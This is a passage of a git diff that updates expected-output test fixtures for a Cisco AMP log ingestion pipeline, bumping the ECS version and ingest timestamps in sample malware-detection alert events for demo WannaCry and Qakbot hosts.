"ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3778,7 +3778,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094101204Z", + "ingested": "2021-09-13T18:07:42.929550429Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3833,7 +3833,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3853,7 +3853,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094103078Z", + "ingested": "2021-09-13T18:07:42.929552332Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3919,7 +3919,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3951,7 +3951,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094104954Z", + "ingested": "2021-09-13T18:07:42.929554208Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -4010,7 +4010,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4040,7 +4040,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094106806Z", + "ingested": "2021-09-13T18:07:42.929556094Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4093,7 +4093,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4113,7 +4113,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094108755Z", + "ingested": "2021-09-13T18:07:42.929558092Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -4164,7 +4164,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4184,7 +4184,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094110607Z", + "ingested": "2021-09-13T18:07:42.929559962Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4239,7 +4239,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4259,7 +4259,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094112459Z", + "ingested": "2021-09-13T18:07:42.929561869Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json index 83afe6a0131..a95a5b457b6 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853984379Z", + "ingested": "2021-09-13T18:07:55.452466436Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -85,7 +85,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -115,7 +115,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853988673Z", + "ingested": "2021-09-13T18:07:55.452471500Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -170,7 +170,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -200,7 +200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853990700Z", + "ingested": "2021-09-13T18:07:55.452473667Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -257,7 +257,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -289,7 +289,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853992661Z", + "ingested": "2021-09-13T18:07:55.452475720Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -346,7 +346,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -378,7 +378,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853994603Z", + "ingested": "2021-09-13T18:07:55.452477766Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -431,7 +431,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -451,7 +451,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853996517Z", + "ingested": "2021-09-13T18:07:55.452479754Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -502,7 +502,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -522,7 +522,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.853998395Z", + "ingested": "2021-09-13T18:07:55.452481714Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -577,7 +577,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -597,7 +597,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854000301Z", + "ingested": "2021-09-13T18:07:55.452483701Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -652,7 +652,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -684,7 +684,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854002194Z", + "ingested": "2021-09-13T18:07:55.452485647Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat 